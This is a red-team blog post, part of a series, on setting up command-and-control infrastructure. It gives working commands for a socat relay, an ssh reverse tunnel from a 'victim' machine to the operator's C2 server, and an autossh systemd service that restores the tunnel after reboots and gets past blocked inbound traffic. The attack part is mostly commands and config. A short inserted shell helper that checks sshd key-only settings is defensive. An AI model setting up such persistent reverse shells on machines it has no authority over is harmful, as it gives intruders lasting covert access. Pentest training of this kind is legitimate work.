Second step in setting up C2 environment. Using socat as front to autossh. Command and Control my way. @c2_matrix #autossh #ssh #pentest #pentesting #redteam #infosec

It is time for part 2 in this series on setting up a Command and Control, and this time I am using ssh to create a reverse ssh tunnel to my C2-1 server, so I can run ssh from a client machine and take over that machine from my C2-1 server. A picture says more than 1000 words, so let's start with that!

(Image: autossh)

The steps!

  1. Run socat
  2. Install ssh server on C2-1 server
  3. Configure C2-1 server for key login and no passwords
  4. Generate keys to use with autossh
  5. Install autossh
  6. Run autossh
  7. Autostart autossh
  8. Access remote machine

We set up socat in part 1, so go there if you want a little more info.

Start the socat server and map port 21 to the ssh server on the C2-1 server, which listens on port 22:

sudo socat TCP4-LISTEN:21,fork TCP4:172.21.21.38:22

Second, we install an ssh server on the C2-1 server, if it is not already installed:

apt-get install openssh-server

How to enable key login for the ssh server

vi /etc/ssh/sshd_config, set PubkeyAuthentication to yes, save the file and run

/etc/init.d/ssh restart

We have now set up an ssh server on the C2-1 server that only accepts key logins. We have also used the socat server to forward any ssh connection from the public IP to our C2-1 server!
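One check worth running before trusting the "key logins only" claim (an added example, not from the original post): sshd keeps the first value it reads for a keyword, keywords are case-insensitive, and an unset PasswordAuthentication defaults to yes, so only setting PubkeyAuthentication does not turn passwords off. The helper below computes the effective value from a flat sshd_config and the sample configs are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original post. sshd keeps the FIRST value it
# reads for a keyword (later duplicates are ignored), keywords are case-
# insensitive, and an unset PasswordAuthentication defaults to yes, so a
# quick grep does not prove that password logins are really off. This helper
# prints the effective value and checks the key-only claim. Assumes a flat
# sshd_config: no Match blocks and no Include directives.
sshd_effective() {   # usage: sshd_effective <config-file> <keyword> <default>
    val=$(awk -v key="$2" '
        /^[ \t]*(#|$)/ { next }                                  # comment/blank
        tolower($1) == tolower(key) { print tolower($2); exit }  # first wins
    ' "$1")
    printf '%s\n' "${val:-$3}"
}

# Returns 0 only when the file really enforces key-only logins.
keys_only_ok() {   # usage: keys_only_ok <config-file>
    [ "$(sshd_effective "$1" PubkeyAuthentication yes)" = yes ] &&
    [ "$(sshd_effective "$1" PasswordAuthentication yes)" = no ]
}

# Constructed sample configs (not the post's real files).
WEAK_CFG=$(mktemp)       # does exactly what the post's step does, nothing more
cat > "$WEAK_CFG" <<'EOF'
#PasswordAuthentication no
PubkeyAuthentication yes
EOF

HARDENED_CFG=$(mktemp)   # passwords off; the later duplicate is ignored
cat > "$HARDENED_CFG" <<'EOF'
PubkeyAuthentication yes
passwordauthentication no
PasswordAuthentication yes
EOF

for cfg in "$WEAK_CFG" "$HARDENED_CFG"; do
    if keys_only_ok "$cfg"; then echo "$cfg: key-only login enforced"
    else echo "$cfg: password login still possible"; fi
done
```

On a live host, `sshd -T` prints the values sshd actually resolved (Match blocks and includes applied), which is the authoritative answer.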

Because this is only a PoC and for my own enjoyment, I do not think too much about security, so I use the same public key for many things. Let me explain. We use keys to access the ssh server. Which keys can be used is configured on the ssh server in the file ~/.ssh/authorized_keys.

That file contains the public key of the client that will access the ssh server. So I create my own key pair, with a public key, using this command (I did this on my workstation):

ssh-keygen

(Image: ssh-keygen)

Then I take the contents of the file ~/.ssh/id_rsa.pub in my home directory and put them into authorized_keys on the C2-1 server.

cat ~/.ssh/id_rsa.pub

Copy what that command prints and put it in the file below on the C2-1 server:

vi ~/.ssh/authorized_keys

Paste it into this file.

Let's try it out!

(Image: ssh with a key)

We have now gone almost all the way.

We can connect from a client to the C2-1 server through the socat server on port 21 with keys, no password.

What we want now is to do this more automatically, and even if the client machine reboots we want it to reconnect.

Wait, at the beginning we talked about reverse tunnels, not just ssh to a server.

Our client connects to the C2-1 server with ssh. But we want to use that ssh tunnel to connect back to the client, hence the name reverse ssh. Look at the picture at the beginning; I hope you get my point.

Let's do this manually first with ssh.

Victim -> ssh -> C2-1 server; then I, who own the C2-1 server, ssh to a local port on the C2-1 server and get access to the Victim.

We do this with this ssh command from the Victim to the C2-1 server:

ssh -4 -R 8889:localhost:22 c2-1@my-jump-server -p 21 -v

ssh is the command
-4 forces IPv4
-R requests a reverse (remote) tunnel
8889 is the port on the C2-1 server from which we can access the victim
22 is the victim's ssh port
c2-1… is my C2 server, which I connect to with ssh on port 21

(Image: From victim to c2)

So the victim has now connected to my C2 server.

Now it is time for me to connect to the victim.

I have a console on my C2-1 machine and ssh to the local port that was defined above:

ssh roger@127.0.0.1 -p 8889

I now have ssh access to the victim through the C2 server.

But what happens if the victim reboots or ssh gets killed? That is where autossh comes in.

This is an application that re-establishes the ssh connection between the victim and the C2 server.

I refer to Victim and C2 so it gets easier to understand what I am talking about.

Let's configure autossh.

Earlier we configured keys to use with ssh. Why? We could use a password. But when we want to use autossh we must use keys and no passwords. That is why.

Let's install autossh:

apt-get install autossh

Then we can try the command manually:

autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/roger/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 c2-1@c2-1.name.domain -p 443

Then we move to our C2 server and connect to the victim through port 6666:

ssh roger@localhost -p 6666

But to survive a reboot of the victim machine, we now want to create a service for autossh.

vim /etc/systemd/system/autossh.service

Paste the following into this file. Change the values to meet your requirements.

[Unit]
Description=AutoSSH service
After=network.target

[Service]
# Reconnect immediately on failure instead of waiting for autossh's gate time
Environment="AUTOSSH_GATETIME=0"
User=roger
Group=roger
# Same tunnel as the manual command above, key path matching the User= above
ExecStart=/usr/bin/autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/roger/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 c2-1@c2-1.domain -p 443
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Then we make the file executable:

chmod +x /etc/systemd/system/autossh.service

Then we enable and start it as a service:

systemctl enable autossh.service
systemctl start autossh.service

(Image: autossh)

When do we use this? This is great if you have a machine where incoming communication is blocked! Then we reverse the ssh, so the victim opens an ssh tunnel out and creates a reverse tunnel on the C2 server for us to access.

Keep hacking!

//Roger
